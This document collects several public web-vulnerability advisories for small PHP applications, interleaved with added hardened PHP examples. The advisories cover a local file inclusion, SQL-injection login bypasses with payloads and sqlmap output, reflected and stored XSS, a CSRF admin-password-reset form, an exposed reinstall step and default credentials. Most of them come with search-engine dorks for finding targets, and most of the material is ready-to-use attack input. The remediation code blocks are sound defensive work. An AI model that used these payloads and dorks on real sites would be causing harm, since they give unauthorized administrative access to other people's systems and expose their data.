<pre><code>====================================================================================================================================<br />| # Title : Aplikasi Sistem Informasi Kelulusan CMS v 1.0.9 [ASIK] LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | <br />| # Vendor : http://lulus.smkn2purwokerto.sch.id/admin.zip | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] the infected file : index.php<br /><br /> <?php<br /><br /> require "config.php";<br /> error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));<br /> $page=$_GET['page'];<br /> $filename="content/$page.php";<br /> if (!file_exists($filename))<br /> {<br /> include "content/home.php";<br /> }<br /> else<br /> {@include "content/$page.php";}<br /> ?><br /><br />[+] LFI : /index.php?page= [Ev!l]<br /><br /><br />====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />===========================================================================================================================================<br /></code></pre>
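A hardened replacement for the include logic in the index.php quoted above, as an added example that is not ASIK's own code: the `page` value is treated as a name to look up in an allowlist built from `content/`, never as a path fragment. `resolve_page()` and the temporary demo directory are hypothetical; PHP 8 is assumed.

```php
<?php
declare(strict_types=1);

/**
 * Map the ?page= value to a file inside $contentDir (added example;
 * resolve_page() is a hypothetical helper, not part of ASIK).
 * Anything that is not a shipped page name falls back to home.php.
 */
function resolve_page(mixed $requested, string $contentDir): string
{
    $home = $contentDir . '/home.php';

    // 1. Shape check: a page name is a short identifier, never a path,
    //    a stream wrapper or an array (?page[]=x).
    if (!is_string($requested)
        || preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested) !== 1) {
        return $home;
    }

    // 2. Allowlist: only files that actually exist in content/ are valid.
    $pages = array_map(
        static fn(string $f): string => basename($f, '.php'),
        glob($contentDir . '/*.php') ?: []
    );
    if (!in_array($requested, $pages, true)) {
        return $home;
    }

    // 3. Containment: the resolved path must still sit under content/
    //    (catches symlinks that point out of the directory).
    $base = realpath($contentDir);
    $real = realpath($contentDir . '/' . $requested . '.php');
    if ($base === false || $real === false
        || !str_starts_with($real, $base . DIRECTORY_SEPARATOR)) {
        return $home;
    }
    return $real;
}

// Constructed demo: a throwaway content/ directory with two pages.
$dir = sys_get_temp_dir() . '/asik_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';");
file_put_contents($dir . '/about.php', "<?php echo 'about';");

foreach (['about', '../config', 'missing', ['x'], null] as $input) {
    $shown = json_encode($input, JSON_UNESCAPED_SLASHES);
    printf("%-14s => %s\n", $shown, basename(resolve_page($input, $dir)));
}
array_map('unlink', glob($dir . '/*.php'));
rmdir($dir);

// In index.php the include then becomes:
//   include resolve_page($_GET['page'] ?? null, __DIR__ . '/content');
```

Dropping the `@` in front of `include` also matters for detection: suppressed include errors hide failed probing from the error log.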
<pre><code>====================================================================================================================================<br />| # Title : AGVirtues Galeria v2.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |<br />| # Vendor : https://codecanyon.net/ |<br />| # Dork : galeria/album.php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use payload : user & pass : ADMIN' OR 1=1#<br /><br />[+] http://wexpomarmorecombr/galeria/admin/album.php <br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Archon CMS V3.14 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.archon.org/ |<br />| # Dork : Archive powered by Archon Version 3.14 |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : archive/index.php?id=34309'"()%26%25<acx><ScRiPt >prompt(908835)</ScRiPt>&p=collections/findingaid&q=&rootcontentid=104040<br /><br />[+] http://127.0.0.1/polishjewsyivoorg/archive/index.php?id=34309%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908835)%3C/ScRiPt%3E&p=collections/findingaid&q=&rootcontentid=104040<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: Beauty Salon Management System v1.0 - SQLi<br /># Date of found: 04/07/2023<br /># Exploit Author: Fatih Nacar<br /># Version: V1.0<br /># Tested on: Windows 10<br /># Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/><br /># Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/<br /># CWE: CWE-89<br /><br />Vulnerability Description -<br /><br />Beauty Salon Management System: V1.0, developed by Campcodes, has been<br />found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability<br />allows an attacker to manipulate login authentication with the SQL queries<br />and bypass authentication. The system fails to properly validate<br />user-supplied input in the username and password fields during the login<br />process, enabling an attacker to inject malicious SQL code. By exploiting<br />this vulnerability, an attacker can bypass authentication and gain<br />unauthorized access to the system.<br /><br />Steps to Reproduce -<br /><br />The following steps outline the exploitation of the SQL Injection<br />vulnerability in Beauty Salon Management System V1.0:<br /><br />1. Open the admin login page by accessing the URL:<br />http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php<br /><br />2. In the username and password fields, insert the following SQL Injection<br />payload shown inside brackets to bypass authentication for username<br />parameter:<br /><br />{Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374<br />ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign<br />In}<br /><br />3. Execute the SQL Injection payload.<br /><br />As a result of successful exploitation, the attacker gains unauthorized<br />access to the system and is logged in with administrative privileges.<br /><br />Sqlmap results:<br /><br />POST parameter 'username' is vulnerable. Do you want to keep testing the<br />others (if any)? [y/N] y<br /><br />sqlmap identified the following injection point(s) with a total of 793<br />HTTP(s) requests:<br /><br />---<br /><br />Parameter: username (POST)<br /><br />Type: boolean-based blind<br /><br />Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)<br /><br />Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374<br />ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign<br />In<br /><br />Type: time-based blind<br /><br />Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /><br />Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)--<br />rvYF&password=test&login=Sign In<br /><br />---<br /><br />[15:58:56] [INFO] the back-end DBMS is MySQL<br /><br />web application technology: PHP 8.2.4, Apache 2.4.56<br /><br />back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)<br /><br /></code></pre>
<pre><code>#Title : Super Store Finder PHP Script SQL Injection / Bypass admin login<br />#Researcher : Etharus<br />#Vendor : Joe Iz, https://superstorefinder.net/<br />#Script Demo Url : https://superstorefinder.net/products/superstorefinder/<br />#Version Affected : 3.6 and below<br />#Date : 5 July 2023<br />#FOFA Dork : "designed and built by Joe Iz."<br /># Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/<br /># Step 2 : Enter following payload<br /><br />username : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -<br />password : admin<br /></code></pre>
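The three login bypasses above (AGVirtues Galeria, Beauty Salon Management System, Super Store Finder) all depend on the username being spliced into the SQL text. The following is an added example, not code from any of those products, of a login check that binds the username as a parameter and verifies the password hash in PHP; the schema, the `login()` helper and the in-memory SQLite database are assumptions made so it runs stand-alone on PHP 8 with pdo_sqlite.

```php
<?php
declare(strict_types=1);

// Constructed in-memory database; table and column names are assumptions,
// not taken from any of the applications above.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)');
    $pdo->prepare('INSERT INTO admins (username, pw_hash) VALUES (?, ?)')
        ->execute(['admin', password_hash('constructed-demo-password', PASSWORD_DEFAULT)]);
    return $pdo;
}

/** Returns the admin id on success, null on any failure (hypothetical helper). */
function login(PDO $pdo, mixed $username, mixed $password): ?int
{
    if (!is_string($username) || !is_string($password)) {
        return null;                        // e.g. username[]=x
    }
    // Bound parameter: the username travels as data, so quotes, UNION and
    // comment markers in it cannot change the structure of the statement.
    $stmt = $pdo->prepare('SELECT id, pw_hash FROM admins WHERE username = ? LIMIT 1');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    // The hash compared here can only come from a stored row; an injected
    // UNION can no longer supply a row with a hash the client chose.
    return password_verify($password, $row['pw_hash']) ? (int) $row['id'] : null;
}

$pdo = demo_db();
$attempts = [
    ['admin', 'constructed-demo-password'],   // valid login
    ['admin', 'wrong'],                       // wrong password
    ["ADMIN' OR 1=1#", "ADMIN' OR 1=1#"],     // string from the AGVirtues entry
];
foreach ($attempts as [$user, $pass]) {
    printf("%-16s => %s\n", $user, var_export(login($pdo, $user, $pass), true));
}
```

Against MySQL through PDO, set `PDO::ATTR_EMULATE_PREPARES` to `false` so the statement is prepared server-side; with mysqli the equivalent is `prepare()` followed by `bind_param()`.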
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://gzscripts.com/car-rental-php-script.html │<br />│ Vendor : GZ Scripts │<br />│ Software : Car Rental Script 1.8 │<br />│ Vuln Type: Stored XSS │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ Allow Attacker to inject malicious code into website, give ability to steal sensitive │<br />│ information, manipulate data, and launch additional attacks. │<br />│ │ <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09 <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />## Stored XSS<br /><br />-----------------------------------------------<br />POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1<br /><br />payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1<br />-----------------------------------------------<br /><br />POST parameter 'first_name' is vulnerable to XSS<br />POST parameter 'second_name' is vulnerable to XSS<br />POST parameter 'phone' is vulnerable to XSS<br />POST parameter 'address_1' is vulnerable to XSS<br />POST parameter 'country' is vulnerable to XSS<br /><br /><br />## Steps to Reproduce:<br /><br />1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car<br />2. Inject your [XSS Payload] in "First Name"<br />3. Inject your [XSS Payload] in "Last Name"<br />4. Inject your [XSS Payload] in "Phone"<br />5. Inject your [XSS Payload] in "Address Line 1"<br />6. Inject your [XSS Payload] in "Country"<br /><br /><br />7. Accept with terms & Press [Booking]<br /> XSS Fired on Local User Browser<br /><br />8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)<br /> XSS Will Fire and Executed on his Browser<br /><br />9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)<br /> XSS Will Fire and Executed on his Browser<br /> <br /> <br />[-] Done<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Allhandsmarketing LMS v2.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://www.allhandsmarketing.com/ | <br />| # Dork : " Design by Allhandsmarketing." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] The following html code create a new admin Password.<br /><br />[+] Go to the line 1.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /backend/add_newPassword.php .<br /><br />[+] save code as poc.html .<br /><br />[+] default user : admin<br /><br />[+] <form class="form-horizontal" action="http://TARGET/backend/add_newPassword.php" name="form2" id="form2"><br /><br /> <fieldset><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="password" id="password" class="form-control" placeholder="Your new password." type="password"><br /> </div><br /> </div><br /><br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()"><br /><br /> </div><br /> </div><br /> <br /> <div class="form-group"><br /> <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label><br /> <div class="col-md-10" id="thumbsite"><br /> <input name="newEmail" value="" class="form-control" type="email"><br /><br /> </div><br /> </div><br /> <br /> </fieldset><br /><br /> <div class=""><br /> <div class="row"><br /> <div class="col-md-12"><br /> <button class="btn btn-default" type="clear"><br /> Cancel<br /> </button><br /><br /> <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit"><br /> <i class="fa fa-save"></i><br /> Submit<br /> </button><br /> </div><br /> </div><br /> </div><br /><br /> </form><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Adveris CMS v3.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | <br />| # Vendor : http://adveris.fr | <br />| # Dork : "Création site internet : Adveris" inurl:.php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Use Payload : /sous-categorie.php?id=6<--`<script>alert(/indoushka/);</script>``> --!><br /><br />[+] http://w127.0.0.1/coveprofr/sous-categorie.php?id=6%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3E<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Advanced HRM v1.6 Reset admin login Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit) |<br />| # Vendor : https://codecanyon.net/item/advanced-hrm/17767006 | <br />| # Dork : "Copyright © CoderPixel 2016 All Rights Reserved" |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] The Vulnerability revolves around resetting script settings and reformulating a new password for the admin .<br /><br />[+] use payload : /application/install/step5.php<br /><br />[+] http://127.0.0.1/appchain.commy/hrm/application/install/step5.php<br /><br />[+] Congratulations!<br /> You have just install Advance HRM!<br /> To Login Admin Portal:<br /> Use this link - http://127.0.0.1/appchain.commy/hrm/<br /> Username: admin<br /> Password: admin.password<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : ADMINA BULGARIA Ltd v 1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | <br />| # Vendor : http://admina.me/ | <br />| # Dork : " ADMINA BULGARIA Ltd.. All Rights Reserved. ." |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] user : admina & pass : 0000<br /><br />[+] http://127.0.0.1/res-clusterorg/admina/ <====| Login<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>